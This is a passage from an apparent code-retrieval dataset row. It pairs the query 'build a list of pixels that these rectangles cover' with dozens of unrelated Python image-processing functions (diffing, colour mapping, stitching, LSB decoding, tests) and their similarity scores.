key=itemgetter(1))[1]\n lordered_pts.insert(0, (0, y))\n lcolumn_available.insert(0, 0)\n\n \"\"\"\n If there are no pixel that corresponding diaphragmatic level in the\n last column, assign to it the value of the penultimate y coordinate\n available\n \"\"\"\n if lcolumn_available[-1] is not 49:\n lordered_pts.append(\n (49, lordered_pts[len(lcolumn_available)][1]))\n lcolumn_available.append(49)\n\n \"\"\"\n Get the biggest y value in each column that represents the\n diaphragmatic level\n \"\"\"\n column = 0\n lcolumn = []\n ldiaphragm_pts = []\n for j in range(50):\n # Get the column's points\n lcolumn = [x for x in lordered_pts if x[0] == column]\n # print('{}: {}'.format(j, lcolumn))\n\n if len(lcolumn) > 0:\n ldiaphragm_pts.append(\n max(lcolumn, key=itemgetter(1))) # Get the biggest y\n else:\n # Get the y value from the previous column\n lcolumn_available.insert(column, column)\n ldiaphragm_pts.append((column, ldiaphragm_pts[-1][1]))\n column += 1\n lcolumn = []\n\n # Draw diaphragmatic level\n diaphragmatic_lvl = np.zeros((256, 50, 3), np.uint8)\n j = 0\n while(j < len(lcolumn_available) - 1):\n cv2.line(\n diaphragmatic_lvl,\n ldiaphragm_pts[j], ldiaphragm_pts[j + 1],\n (0, 0, 255), 1)\n j = j + 1\n\n lcolumn_available = []\n\n print(\"Diaphragmatic's points: \", ldiaphragm_pts)\n cv2.imshow('Diaphragmatic level', diaphragmatic_lvl)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n cv2.imwrite('{}/{}/{}/{}'.format(\n DIR_2DST_Diaphragm, patient, plan, files[i]), diaphragmatic_lvl)\n\n # file = open('{}/{}/{}/points.txt'.format(DIR_2DST_Diaphragm, self.patient, self.plan), 'a')\n # file.write(\"{}:{}\\n\".format(files[i], ldiaphragm_pts))\n # file.close()\n\n # return ldiaphragm_pts", "def graph_maze_mismatch(filepaths, runs):\n plt.clf()\n denom = 15376.0 # the ouput matrix for an nxn net is size (2(n+2))^2\n for i in range(0,len(runs)):\n run = runs[i]\n plt.plot(run*(100.0/denom), linewidth = '1.0', label = filepaths[i])\n plt.title('Accuracy over time when features swapped')\n plt.xlabel('Test-Time iterations')\n plt.ylabel('Accuracy')\n plt.legend(loc=\"lower right\")\n plt.savefig(\"maze_mismatch.png\", dpi=500)", "def image_diff(image_a, image_b):\n histogram_diff = total_histogram_diff(pixel_diff(image_a, image_b))\n\n return histogram_diff", "def decode_image(file_location=\"images/encoded_sample.png\"):\n encoded_image = Image.open(file_location)\n\n x_size = encoded_image.size[0]\n y_size = encoded_image.size[1]\n\n decoded_image = Image.new(\"RGB\", encoded_image.size)\n pixels = decoded_image.load()\n\n for x in range(x_size):\n for y in range(y_size):\n if lsb_of_red_pixel(encoded_image, x, y):\n pixels[x, y] = (255,255,255)\n else:\n pixels[x, y] = (0, 0, 0)\n\n #pixels[x, y] = [(0,0,0) if lsb_of_pixel(red_channel, x, y) else (1,1,1)]\n\n decoded_image.save(\"images/decoded_image.png\")\n decoded_image.show()", "def greencalculator(input_map):\n #Convert the raster to an array\n image =Image.open(input_map)\n array = numpy.array(image)\n #Obtain number of elements in array \n lst = array.shape\n count = lst[0]*lst[1]\n #Divide array in quadrants\n quadrants = array[:(lst[0]/2), :(lst[1]/2)], array[(lst[0]/2):, :(lst[1]/2)], array[:(lst[0]/2), (lst[1]/2):], array[(lst[0]/2):, (lst[1]/2):]\n green_list = []\n #Calculate percentage of green per quadrant\n for i in quadrants:\n percentage = (100*float(numpy.sum(i)))/(count/4)\n green_list += [round(percentage, 3)]\n return green_list", "def blue_matrix(self):\n return np.vstack(np.where(self.np_image_matrix() == 2))", "def imageprepare():\r\n file_name = '9-test.png'\r\n im = Image.open(file_name).convert('L')\r\n\r\n im.save(\"9-t.png\")\r\n plt.imshow(im)\r\n plt.show()\r\n tv = list(im.getdata())\r\n\r\n # normalize pixels to 0 and 1. 0 is pure white, 1 is pure black.\r\n tva = [(255 - x) * 1.0 / 255.0 for x in tv]\r\n return tva", "def get_identical_patches(imgs, patch_size):\n ih, iw = imgs[0].shape[:2]\n tp = patch_size\n ix = np.random.randint(0, iw - patch_size)\n iy = np.random.randint(0, ih - patch_size)\n imgs = []\n for i in range(len(imgs)):\n imgs.append(imgs[i][iy:iy + tp, ix:ix + tp, :])\n return imgs", "def _diff_images(img_before, img_after):\n width_before, height_before = img_before.size\n width_after, height_after = img_after.size\n data_before = img_before.getdata()\n data_after = img_after.getdata()\n\n width, height = max(width_before, width_after), max(height_before, height_after)\n offset_ax = (width - width_before) // 2\n offset_ay = (height - height_before) // 2\n offset_bx = (width - width_after) // 2\n offset_by = (height - height_after) // 2\n\n diff = 0\n for y in range(height):\n for x in range(width):\n ax, ay = x - offset_ax, y - offset_ay\n bx, by = x - offset_bx, y - offset_by\n if (ax < 0 or bx < 0 or ax >= width_before or bx >= width_after or\n ay < 0 or by < 0 or ay >= height_before or by >= height_after):\n diff += 1\n else:\n if data_before[ax + ay *width_before] != data_after[bx + by * width_after]:\n diff += 1\n try:\n return round(diff / float(width * height), 4)\n except ZeroDivisionError:\n return 0.0", "def __get_color_table(self):\n #Color: Green Yellow Orange Red Distance:\n return [[0.70, 0.15, 0.1, 0.05], # 0\n [0.17, 0.6, 0.17, 0.06], # 1\n [0.06, 0.17, 0.6, 0.17], # 2\n [0.05, 0.12, 0.23, 0.6], # 3\n [0.05, 0.1, 0.15, 0.8]] # >= 4 ", "def reduceImage(img,N,M,n,m):\n scaleN = int(n/(2*N))\n scaleM = int(m/(2*M))\n imgR = np.zeros((2*N+1,2*M+1))\n for i in range(2*N+1):\n for j in range(2*M+1):\n if img[i*scaleN+2,j*scaleM+2,3] != 255:\n imgR[i,j] = 0.\n else: \n imgR[i,j] = 1.\n return imgR", "def false_color_fast(img):\n # red LUT\n red = np.zeros(256, dtype=\"uint8\")\n red[0:43] = 255\n red[43:86] = np.arange(43, 0, -1) * (255.0 / 43.0)\n red[172:215] = np.arange(0, 43) * (255.0 / 43.0)\n red[214:] = 255\n # green LUT\n green = np.zeros(256, dtype=\"uint8\")\n green[0:43] = np.arange(43) * (255.0 / 43.0)\n green[43:129] = 255\n green[129:172] = np.arange(43, 0, -1) * (255.0 / 43.0)\n # blue LUT\n blue = np.zeros(256, dtype=\"uint8\")\n blue[86:129] = np.arange(43) * (255.0 / 43.0)\n blue[129:213] = 255\n blue[213:] = np.arange(43, 0, -1) * (255 / 43.0)\n\n m,n = img.shape\n img_fc = np.zeros((m, n, 3))\n\n img_fc_r = cv2.LUT(img, red)\n img_fc_g = cv2.LUT(img, green)\n img_fc_b = cv2.LUT(img, blue)\n img_fc = cv2.merge((img_fc_r, img_fc_g, img_fc_b))\n\n return img_fc", "def get_pixel_list(img):\n orig_shape = img.shape # Remember the original shape of the img.\n # Store the img as a x by z array (z being the length of the colour space)\n # Essentially just a list of pixels.\n\n if len(img.shape) == 3:\n img = img.reshape(img.shape[0] * img.shape[1], img.shape[2])\n elif len(img.shape) == 2:\n img = img.reshape(img.shape[0] * img.shape[1],)\n return orig_shape, img", "def get_lines_test_pattern(img_size=(2048, 2048), angles=(0, 45, 90, 135)):\n\n my, mx = img_size\n\n width = 1\n # line_center_sep = width + line_edge_sep\n line_center_sep = np.arange(13, 0, -1)\n line_edge_sep = line_center_sep - width\n\n line_pair_sep = 30\n\n n = np.sum(line_edge_sep) + len(line_center_sep) * 2 * width + (len(line_center_sep) - 1) * line_pair_sep\n\n gt = np.zeros((n, n))\n start = 0\n\n for ii in range(len(line_center_sep)):\n gt[:, start:start + width] = 1\n\n a = start + width + line_edge_sep[ii]\n gt[:, a:a + width] = 1\n\n start = a + width + line_pair_sep\n\n # pad image\n pxl = int(np.floor((mx - gt.shape[1]) / 2))\n pxr = int(mx - gt.shape[1] - pxl)\n\n pyu = int(np.floor((my - gt.shape[0]) / 2))\n pyd = int(my - gt.shape[0] - pyu)\n\n gtp = np.pad(gt, ((pyu, pyd), (pxl, pxr)), mode='constant')\n\n test_patterns = []\n for a in angles:\n img = Image.fromarray(gtp)\n test_patterns.append(np.asarray(img.rotate(a, expand=0)))\n\n test_patterns = np.asarray(test_patterns)\n\n return test_patterns, line_center_sep", "def visualise_points_on_rd(rd_matrix, path, points, range_res, doppler_res):\n rd_img = SignalVisualizer(rd_matrix).get_image\n for point in points:\n range_coord = (point[0] / range_res).astype(int)\n doppler_coord = (point[1] / doppler_res).astype(int)\n if point[1] < 0:\n doppler_coord += int(rd_matrix.shape[1]/2 - 1)\n else:\n doppler_coord += int(rd_matrix.shape[1]/2)\n rd_img[range_coord*4:(range_coord*4+4),\n doppler_coord*4:(doppler_coord*4+4)] = [0., 0., 0.]\n plt.imsave(path, rd_img)\n plt.close()", "def vizDifference(diff):\n return (((diff - diff.min()) / (diff.max() - diff.min())) * 255).astype(np.uint8)", "def stitch_images(images, margin=5, cols=5):\n n, w, h, = images.shape\n n_rows = max(1, int(math.ceil(n / cols)))\n n_cols = min(n, cols)\n\n out_w = n_cols * w + (n_cols - 1) * margin\n out_h = n_rows * h + (n_rows - 1) * margin\n stitched_images = np.zeros((out_h, out_w), dtype=images.dtype)\n\n for row in range(n_rows):\n for col in range(n_cols):\n img_idx = row * cols + col\n if img_idx >= n:\n break\n\n stitched_images[(h + margin) * row : (h + margin) * row + h,\n (w + margin) * col : (w + margin) * col + w] = images[img_idx]\n\n return stitched_images", "def equalize_color(img):\n imgeq = numpy.zeros_like(img, dtype='float')\n for i in xrange(img.shape[2]):\n imgeq[:,:,i] = exposure.equalize_hist(img[:,:,i])\n return imgeq", "def flow_error_image(flow_1, flow_2, mask_occ, mask_noc=None, log_colors=True):\n mask_noc = np.ones(mask_occ.shape) if mask_noc is None else mask_noc\n diff_sq = (flow_1 - flow_2) ** 2\n diff = np.sqrt(np.sum(diff_sq, axis=-1, keepdims=True))\n if log_colors:\n height, width, _ = flow_1.shape\n colormap = [\n [0, 0.0625, 49, 54, 149],\n [0.0625, 0.125, 69, 117, 180],\n [0.125, 0.25, 116, 173, 209],\n [0.25, 0.5, 171, 217, 233],\n [0.5, 1, 224, 243, 248],\n [1, 2, 254, 224, 144],\n [2, 4, 253, 174, 97],\n [4, 8, 244, 109, 67],\n [8, 16, 215, 48, 39],\n [16, 1000000000.0, 165, 0, 38]]\n colormap = np.asarray(colormap, dtype=np.float32)\n colormap[:, 2:5] = colormap[:, 2:5] / 255\n mag = np.sqrt(np.sum(np.square(flow_2), axis=-1, keepdims=True))\n error = np.min(diff / 3, 20 * diff / mag)\n im = np.zeros([height, width, 3])\n for i in range(colormap.shape[0]):\n colors = colormap[i, :]\n cond = np.logical_and(np.greater_equal(error, colors[0]), np.less(error, colors[1]))\n im = np.where(np.tile(cond, [1, 1, 1, 3]), np.ones([height, width, 1]) * colors[2:5], im)\n\n im = np.where(np.tile(np.array(mask_noc, dtype=bool), [1, 1, 1, 3]), im, im * 0.5)\n im = im * mask_occ\n else:\n error = (np.min(diff, 5) / 5) * mask_occ\n im_r = error # errors in occluded areas will be red\n im_g = error * mask_noc\n im_b = error * mask_noc\n im = np.stack([im_r, im_g, im_b], axis=-1)\n return im", "def test_flip_vertical() -> None:\n original = create_image(3, 2)\n set_color(original, 0, 0, create_color(0, 0, 0))\n set_color(original, 1, 0, create_color(90, 90, 90))\n set_color(original, 2, 0, create_color(255, 255, 255))\n set_color(original, 0, 1, create_color(10, 10, 10))\n set_color(original, 1, 1, create_color(0, 0, 0))\n set_color(original, 2, 1, create_color(90, 90, 90))\n \n expected = create_image(3, 2)\n set_color(expected, 0, 0, create_color(10, 10, 10))\n set_color(expected, 1, 0, create_color(0, 0, 0))\n set_color(expected, 2, 0, create_color(90, 90, 90))\n set_color(expected, 0, 1, create_color(0, 0, 0))\n set_color(expected, 1, 1, create_color(90, 90, 90))\n set_color(expected, 2, 1, create_color(255, 255, 255))\n \n flipped_vertical = flip_vertical(original)\n \n for x, y, col in flipped_vertical: # tests each colour of each pixel of the filtered sample image and compares it to the expected image\n check_equal('Checking pixel @(' + str(x) + ', ' + str(y) + ')', col, get_color(expected, x, y))", "def fakingColors(pixel):\n\n return (\n pixel[0] * 0.598 - 0.1957 * pixel[1] - 0.038 * pixel[2],\n pixel[1] * 1.174 - pixel[0] * 0.1994 - pixel[2] * 0.076,\n pixel[2] * 0.228 - pixel[0] * 0.1495 - pixel[1] * 0.2935\n )", "def _stripe(self, start_pixel, num_pixels):\n cols = [] # list of lists of 1-pixel columns\n for n in range(num_pixels):\n cols.append(self._column(start_pixel + n))\n stripe = []\n avg = ()\n for pixels in zip(*cols):\n r = g = b = 0\n for p in pixels:\n r += p[0]\n g += p[1]\n b += p[2]\n col_count = len(pixels)\n avg = (float(r/col_count), float(g/col_count), \n float(b/col_count), 255)\n stripe.append(avg)\n return stripe", "def createdog(self,imagearr):\n re = [0,1,2,3]\n re[0] = self.diff(self.gs_blur(self.sigma,imagearr))\n for i in range(1,4):\n base = self.sampling(re[i-1][2])\n re[i] = self.diff(self.gs_blur(self.sigma, base))\n return re", "def pix2pix_results_to_frames(img_array):\n frames = []\n\n for i in range(int(len(img_array)/3)):\n\n try:\n left = cv2.resize(img_array[i * 3], dsize=(512, 512), interpolation=cv2.INTER_NEAREST)\n right = cv2.resize(img_array[i * 3 + 2], dsize=(512, 512), interpolation=cv2.INTER_NEAREST)\n\n scale = 512/img_array[i * 3 + 1].shape[0]\n middle = cv2.resize(img_array[i * 3 + 1], (0, 0), fx=scale, fy=scale, interpolation=cv2.INTER_NEAREST)\n\n frames.append(np.concatenate((left, middle, right), axis=1))\n\n frames.append(img_array[i * 3+1])\n except:\n print(\"Error\")\n\n return frames", "def filter_images(self, images):\n status = self.day_or_night(images[0][1],\n self.gray_refs['day'][0],\n self.gray_refs['night'][0])\n print status\n exclusions = self.gray_refs[status]\n threshold = 0.7\n last_ref = None\n result = []\n\n for filename, gray_img, raw_img in images:\n skip = False\n if last_ref:\n dist = ssim(gray_img, exclusions[last_ref], multichannel=False)\n if dist > threshold:\n skip = True\n\n if not skip:\n for i, gray_ref in enumerate(exclusions):\n if i == last_ref:\n continue\n dist = ssim(gray_img, gray_ref, multichannel=False)\n if dist > threshold:\n skip = True\n last_ref = i\n break\n\n if not skip:\n if (time.time() - self.last_notify) > notify_thresh:\n send_alert('Alert! Motion detected near front door.')\n self.last_notify = time.time()\n result.append((filename, gray_img, raw_img))\n return result", "def find_tfl_lights(image: np.ndarray):\n kernel = np.array(\n [[0, 0, 0],\n [0, 0, 0],\n [0, 1, 0],\n [1, 3, 1],\n [0, 1, 0]])\n\n kernel = kernel - kernel.mean()\n\n red_image = image.copy()\n red_image = red_image[:, :, 0]\n _, red_image = cv2.threshold(red_image, 200, 255, cv2.THRESH_BINARY)\n output = cv2.filter2D(red_image, -1, kernel)\n output_copy = output.copy()\n output = ndimage.maximum_filter(output, size=30)\n output = output - output_copy\n mask = ((output == 0) & (output_copy > 0))\n red_points = np.where(mask)\n positions = []\n final_red_points = []\n for point1 in range(len(red_points[0])):\n point = (red_points[0][point1], red_points[1][point1])\n pixel = image[point[0], point[1]]\n if (pixel[1] < 170 or pixel[2] < 120) and pixel[0] >= 200:\n final_red_points.append(point)\n final_red_points = filter_points(final_red_points)\n positions += final_red_points\n auxilary = ['r'] * len(positions)\n red_x = [val[1] for val in final_red_points]\n red_y = [val[0] for val in final_red_points]\n green_image = image.copy()\n green_image = green_image[:, :, 1]\n _, green_image = cv2.threshold(green_image, 190, 255, cv2.THRESH_BINARY)\n output = cv2.filter2D(green_image, -1, kernel)\n output_copy = output.copy()\n output = ndimage.maximum_filter(output, size=30)\n output = output - output_copy\n mask = ((output == 0) & (output_copy > 0))\n green_points = np.where(mask)\n final_green_points = []\n for point1 in range(len(green_points[0])):\n point = (green_points[0][point1], green_points[1][point1])\n pixel = image[point[0], point[1]]\n if pixel[0] <= 180 and pixel[1] >= 220 and pixel[2] >= 160:\n final_green_points.append(point)\n\n final_green_points = filter_points(final_green_points)\n positions += final_green_points\n auxilary += ['g'] * len(final_green_points)\n green_x = [val[1] for val in final_green_points]\n green_y = [val[0] for val in final_green_points]\n print(f\"There are {len(green_x) + len(red_x)} points\")\n return positions, auxilary", "def grey_to_rgb_imitation(img):\n return np.repeat(img[...,np.newaxis], 3, -1)", "def make_diff(file_before, file_after, file_output_name):\n if os.path.exists(file_output_name):\n shutil.rmtree(file_output_name)\n os.mkdir(file_output_name)\n psd_diff = diff(file_before, file_after)\n diff_content = {}\n for attr in [\"header\", \"layer\"]:\n diff_content[attr] = getattr(psd_diff, attr)\n with open(os.path.join(file_output_name, \"diff.json\"), \"w\") as diff_file:\n json.dump(diff_content, diff_file, indent=4)\n saved_files = []\n for layer_id in psd_diff.layer.keys():\n if len(psd_diff.layer_image[layer_id]) > 1:\n output_image = os.path.join(file_output_name, layer_id)\n psd_diff.layer_image[layer_id][\"before\"].save(output_image + \".before.png\")\n psd_diff.layer_image[layer_id][\"after\"].save(output_image + \".after.png\")\n diff_image_before = Image.new(\"RGBA\", psd_diff.layer_image[layer_id][\"before\"].size)\n diff_image_before_data = diff_image_before.load()\n diff_image_after = Image.new(\"RGBA\", psd_diff.layer_image[layer_id][\"after\"].size)\n diff_image_after_data = diff_image_after.load()\n width, height = diff_image_before.size\n pixel_index = 1\n for y in xrange(height):\n for x in xrange(width):\n if str(pixel_index) in diff_content[\"layer\"][layer_id][\"pixel\"]:\n diff_image_before_data[x, y] = tuple(diff_content[\"layer\"][layer_id][\"pixel\"][str(pixel_index)][\"before\"])\n diff_image_after_data[x, y] = tuple(diff_content[\"layer\"][layer_id][\"pixel\"][str(pixel_index)][\"after\"])\n else:\n diff_image_before_data[x, y] = (0, 0, 0, 0)\n diff_image_after_data[x, y] = (0, 0, 0, 0)\n pixel_index += 1\n diff_image_before.save(output_image + \".before.diff.png\", \"PNG\")\n diff_image_after.save(output_image + \".after.diff.png\", \"PNG\")\n saved_files.append(output_image + \".before.png\")\n saved_files.append(output_image + \".before.diff.png\")\n saved_files.append(output_image + \".after.diff.png\")\n saved_files.append(output_image + \".after.png\")\n saved_files.append(file_output_name + \"/diff.json\")\n return saved_files", "def create_uniform_image(height, width, pixel):\n pixels = []\n\n for r in range(height):\n row = [pixel] * width\n pixels += [row]\n\n return pixels", "def _correct_images(images):\n # From the MNIST website: \"Pixels are organized row-wise. Pixel values are 0 to 255. 0 means\n # background (white), 255 means foreground (black).\"\n # The dataset does not transform the image such that 255 is black, so do that here.\n dtype = _assert_dtype(images)\n max_val = 255 if dtype == dtypes.uint8 else 1.0\n return max_val - images", "def diffImages(imgA, imgB):\n bandsImgA = imgA.split()\n bandsImgB = imgB.split()\n\n absDiff = ImageMath.eval(\"convert(abs(a0-b0) + abs(a1-b1) + abs(a2-b2), 'L')\",\n a0 = bandsImgA[0], b0 = bandsImgB[0],\n a1 = bandsImgA[1], b1 = bandsImgB[1],\n a2 = bandsImgA[2], b2 = bandsImgB[2])\n bandsImgOut = [\n ImageMath.eval(\"convert(a + 2*diff, 'L')\", a = bandsImgA[0], diff = absDiff),\n ImageMath.eval(\"convert(a - diff, 'L')\", a = bandsImgA[1], diff = absDiff),\n ImageMath.eval(\"convert(a - diff, 'L')\", a = bandsImgA[2], diff = absDiff),\n ]\n\n return Image.merge('RGB', bandsImgOut)", "def refill_real(img, result, clustermask, cluster_colors):\n overall_dist = 0\n w, h, _ = img.shape\n for x in range(w):\n for y in range(h):\n cid = clustermask[x, y]\n result[x, y] = cluster_colors[cid]", "def stitch_images(images, margin=5, cols=5):\n if len(images) == 0:\n return None\n\n h, w, c = images[0].shape\n n_rows = int(math.ceil(len(images) / cols))\n n_cols = min(len(images), cols)\n\n out_w = n_cols * w + (n_cols - 1) * margin\n out_h = n_rows * h + (n_rows - 1) * margin\n stitched_images = np.zeros((out_h, out_w, c), dtype=images[0].dtype)\n\n for row in range(n_rows):\n for col in range(n_cols):\n img_idx = row * cols + col\n if img_idx >= len(images):\n break\n\n stitched_images[(h + margin) * row : (h + margin) * row + h,\n (w + margin) * col : (w + margin) * col + w, :] = images[img_idx]\n\n return stitched_images", "def generate_colour_data(width, height, imagiry_data, pixel2coord):\n for i in range(1, height):\n for j in range(1, width):\n colour_data.append(\n [\n pixel2coord(j, i)[0],\n pixel2coord(j, i)[1],\n imagiry_data.read([1])[0][i - 1][j - 1],\n \n ]\n )", "def tabulate(image_path):\n img = cv.imread(image_path, cv.IMREAD_ANYDEPTH)\n unique, counts = np.unique(img, return_counts=True)\n dummy = [print(a[0], a[1]) for a in zip(unique, counts)]", "def assemble_matrix_images(self, matrix: pd.DataFrame) -> pd.DataFrame:\n img_matrix = matrix.copy(deep=True)\n for row in range(len(matrix)):\n for col in range(len(matrix.iloc[0])):\n if matrix.iloc[row,col]:\n response = requests.get(matrix.iloc[row,col])\n img_matrix.iloc[row,col] = Image.open(BytesIO(response.content))\n\n # producing image\n vertical = []\n for row in range(len(img_matrix)):\n hstack_list = []\n for item in img_matrix.iloc[row]:\n if item:\n hstack_list += [(np.array(item.convert(\"RGB\")))]\n else:\n hstack_list += [np.zeros((512,512,3), dtype= np.uint8)]\n horizontal_combs = np.hstack(hstack_list)\n vertical += [horizontal_combs]\n imgs_comb = np.vstack(vertical)\n imgs_comb = Image.fromarray( imgs_comb)\n imgs_comb.show()\n return img_matrix", "def phantom_rectangles(n_points,R):\n \n \n #Rescaling according to image size \n R[:,0] = R[:,0]*n_points/2\n R[:,1] = R[:,1]*n_points/2\n R[:,2] = R[:,2]*n_points/2\n R[:,3] = R[:,3]*n_points/2\n R[:,4] = R[:,4]*math.pi/180\n \n x,y = np.meshgrid(np.arange(0,n_points)-n_points//2 ,np.arange(0,n_points)-n_points//2 )\n nrow,ncol = R.shape\n phantom1 = np.zeros((y.shape[0], y.shape[1], nrow))\n\n for k in range(nrow): #itero sui rettangoli\n x_new = x - R[k,0]\n y_new = y - R[k,1]\n\n u = abs(x_new*math.cos(R[k,4])+y_new*math.sin(R[k,4]))\n v = abs(-x_new*math.sin(R[k,4])+y_new*math.cos(R[k,4]))\n\n for i in range(x.shape[0]):\n for j in range(x.shape[1]):\n if (u[i,j] < R[k,2]/2 and v[i,j] < R[k,3]/2):\n phantom1[i,j,k] = R[k,5]; # gray scale\n else:\n phantom1[i,j,k] = 0.0;\n #endif\n #endfor\n #endfor\n #endfor\n\n phantom1 = phantom1.sum(axis=2)\n phantom = np.flipud(phantom1)\n return phantom", "def calculate_difference_image(img1, img2, tofloat=True):\n diff = img2 - img1\n if len(diff.shape) == 2:\n diff = diff.reshape((diff.shape[0], diff.shape[1], 1))\n channels = diff.shape[-1]\n\n newmax = 1 if tofloat else 255\n newmin = 0\n out = np.zeros(diff.shape)\n oldmin = diff.reshape(-1,channels).min(axis=0)\n oldmax = diff.reshape(-1,channels).max(axis=0)\n\n for dim in range(channels):\n pxs = diff[:,:,dim]\n oldmin = pxs.min()\n oldmax = pxs.max()\n out[:,:,dim] = (pxs - oldmin) * (newmax - newmin) / (oldmax - oldmin) + newmin\n\n if channels == 1:\n out = out.squeeze()\n\n return out", "def reveal_RGB_image(filename):\n\tnew_array = [[], [], []]\n\tim = Image.open(filename)\n\tpixels = convert_image_to_pixels(filename) # get RGB array\n\tfor pixel in pixels: # get tuple of RGB\n\t\tfor x in range(3): # get R, G, B lists\n\t\t\tnew_array[x].append(85 * (pixel[x] & 3)) # change 0-3 to 0-255\n\t\t# get hidden 2 least significant bits\n\tfinal_array = list(zip(new_array[0], new_array[1], new_array[2]))\n\t# create a new image container in RGB mode,\n\t# and import array pixels data into the container\n\treturn convert_pixels_to_image(final_array, im.size)", "def gdtshow(X, N=10):\n from numpy import newaxis, ravel, ceil, zeros, ones, transpose, repeat, concatenate, arange, reshape, floor\n\n def apply_lut(img, lut):\n def lut_map(intens, lut=lut): return lut[intens]\n g = reshape(transpose(map(lut_map, ravel(img))), (3,img.shape[0],img.shape[1]))\n return g\n np = 1 # number of pixels by isoline\n if len(X.shape) == 1: X = X[newaxis,:]\n maxi, mini = X.max(), X.min()\n d = int(ceil(256./N))\n m = zeros(256)\n m[0:256:d] = 1\n m = transpose([m,m,m])\n # lut gray\n gray = floor(arange(N)*255. // (N-1) + 0.5).astype('B')\n gray = repeat(gray, d)[0:256]\n gray = transpose([gray,gray,gray])\n # lut jet\n r = concatenate((range(126,0,-4),zeros(64),range(0,255,4),255*ones(64),range(255,128,-4)))\n g = concatenate((zeros(32),range(0,255,4),255*ones(64),range(255,0,-4),zeros(32)))\n b = 255 - r\n jet = transpose([r,g,b])\n # apply lut\n XX = floor((X-mini)*255. // maxi + 0.5).astype('B')\n lut = (1-m)*gray + m*jet\n Y = apply_lut(XX, lut)\n return Y", "def combine_test():\n\n red = create_image(1, 3, create_color(255, 0, 0))\n green = create_image(1, 3, create_color(0, 255, 0))\n blue = create_image(1, 3, create_color(0, 0, 255))\n\n expected = create_image(1, 3, create_color(255, 255, 255))\n\n result = combine(red, green, blue)\n\n for x, y, (r, g, b) in result:\n if (r, g, b) == tuple(get_color(expected, x, y)):\n print(\"Pixel at (\" + str(x) + \",\" + str(y) + \") passed.\")\n else:\n print(\"Pixel at (\" + str(x) + \",\" + str(y) + \") failed. Expected \" + str((r, g, b)) + \" got \"\n + str(get_color(expected, x, y)))", "def img2line(img):\n img = img_as_bool(img)\n Ns = sum(img, axis=1)\n N = sum(Ns)\n\n ni, nj = img.shape\n jrange = np.arange(nj)\n\n iseq = np.zeros(N, dtype=int)\n jseq = np.zeros(N, dtype=int)\n\n ii = iseq\n jj = jseq\n for i, n in enumerate(Ns):\n ii, ii[:n] = ii[:n], i\n jj, jj[:n] = jj[:n], jrange[img[i, :] == 1]\n\n assert not ii\n assert not jj\n\n return iseq, jseq", "def generate_image(row):\n image = np.zeros((960, 1280, 4), np.uint8) \n image[:,:] = (128, 128, 128, 255)\n x = int(row['currXcorrected'])\n y = int(row['currYcorrected']) \n path = \"/net/store/nbp/projects/fixdur/stimuli/single_bubble_images/\" + \\\n str(row.loc['image']) + \"/\" + \\\n \"bubble_\" + str(x) + \"_\" + str(y) + \".tiff\"\n bubble = prepare_bubble(path) \n image[y:y+154, x:x+154] = bubble\n\n return image", "def reconstruct_from_grayscale_patches( patches, origin, epsilon=1e-12 ):\n patch_width = patches.shape[2]\n patch_height = patches.shape[1]\n img_width = np.max( origin[1] ) + patch_width\n img_height = np.max( origin[0] ) + patch_height\n\n out = np.zeros( (img_height,img_width) )\n wgt = np.zeros( (img_height,img_width) )\n for i in range(patch_height):\n for j in range(patch_width):\n out[origin[0]+i,origin[1]+j] += patches[:,i,j]\n wgt[origin[0]+i,origin[1]+j] += 1.0\n\n return out/np.maximum( wgt, epsilon ), wgt", "def joinImages(imgs):\n d = imgs.shape[0]\n h, w = imgs.shape[1], imgs.shape[2]\n colour = imgs.shape[3]\n img = np.zeros((h, w * d, colour))\n for idx, image in enumerate(imgs):\n i = idx\n img[0:h, i * w:i * w + w, :] = image\n return ((img * 255.) + 1) * 2", "def colour_image(self):\n for row_cnt, colour_row in enumerate(self.table_colour):\n self.processed = []\n for column_cnt, colour in enumerate(colour_row):\n self.row_cnt = row_cnt + 3\n self.column_cnt = column_cnt\n self.colour = colour\n self.word = self.original_rows[self.row_cnt - 3][self.column_cnt]\n self.colour_specific_word()", "def mirror(img):\n return img[:, ::-1]", "def check_border(pool, func, images, entries, copy_failed):\n start = time.perf_counter()\n test_results = pool.map(func, images)\n logger.info(\"%i of %i images have white border.\",\n test_results.count(True), len(test_results))\n failed = []\n # Iterate in reverse to avoid shifting\n # the indices of the objects we want to remove\n for i, passed in reversed(list(enumerate(test_results))):\n if not passed:\n del images[i]\n failed.append(entries.pop(i))\n if failed:\n # Log the names in their original order\n failed = list(reversed(failed))\n logger.info(\"Skipping %i images:\", len(failed))\n util.pprint_log([x.name for x in failed], logger.info)\n if copy_failed:\n _copy_failed(failed)\n logger.info(util.elapsed(start))\n logger.info(\"\\n\")" ]
[ "0.594339", "0.5888286", "0.5828619", "0.5812646", "0.5808996", "0.5784285", "0.57349354", "0.57313955", "0.5709643", "0.56814396", "0.566322", "0.56176597", "0.55183667", "0.5507987", "0.54847234", "0.54687953", "0.5410043", "0.53843975", "0.53818494", "0.53818494", "0.5374305", "0.5341885", "0.5327227", "0.5293554", "0.52656937", "0.52650297", "0.524048", "0.5235731", "0.52053887", "0.52048236", "0.51777524", "0.5167627", "0.5152071", "0.5152036", "0.51512814", "0.51467514", "0.51382947", "0.51291865", "0.51264656", "0.5122172", "0.51160264", "0.51095885", "0.51071936", "0.5099961", "0.5099415", "0.50989735", "0.50974023", "0.50956863", "0.5091406", "0.50776935", "0.50742424", "0.50639945", "0.50623554", "0.5056605", "0.5044332", "0.5041221", "0.5030338", "0.50275487", "0.5017519", "0.501203", "0.5008173", "0.5004803", "0.50044465", "0.49922353", "0.49914896", "0.49878332", "0.49798918", "0.4977223", "0.49764562", "0.49753666", "0.49735236", "0.49654618", "0.49645266", "0.49645084", "0.49605277", "0.49579573", "0.49534982", "0.49529946", "0.49525762", "0.49383825", "0.49360278", "0.4934216", "0.4930809", "0.49305487", "0.4928669", "0.4922795", "0.4915297", "0.49007353", "0.48996425", "0.48964304", "0.48959434", "0.4895194", "0.48916197", "0.48885614", "0.4887207", "0.48845443", "0.48822647", "0.48804474", "0.48752373", "0.487512" ]
0.7071252
0
From the list of rectangles, build a list of pixels that these rectangles cover
